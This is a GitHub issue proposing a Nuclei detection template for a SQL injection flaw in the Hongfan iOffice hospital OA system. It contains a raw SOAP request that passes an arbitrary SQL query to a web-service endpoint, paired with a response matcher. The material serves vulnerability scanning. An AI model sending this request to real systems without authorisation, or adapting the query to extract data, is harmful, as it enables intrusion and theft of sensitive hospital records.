### ISSUE TITLE
hongfan-ioffice-ioassistance-sqli

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7986]
### Template Information:

hongfan-ioffice-ioassistance-sqli
app="红帆-ioffice"

### Nuclei Template:

```yaml
id: hongfan-ioffice-ioassistance-sqli
info:
  name: hongfan-ioffice-ioassistance-sqli
  author: SleepingBag945
  severity: high
  description: 红帆ioffice 10医院版存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。
  reference:
    - https://www.ioffice.cn/newsinfo/1616026.html
  tags: hongfan,oa,sqli

http:
  - raw:
      - |
        POST /ioffice/prg/set/wss/ioAssistance.asmx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
        Accept: */*
        Content-Type: text/xml; charset=utf-8
        Accept-Encoding: gzip

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
              <sql>select SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','3696661')),3,32)</sql>
            </GetLoginedEmpNoReadedInf>
          </soap:Body>
        </soap:Envelope>


    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "075c6a0eb84da500a3fbfa435dca8afb")'
        condition: and
```
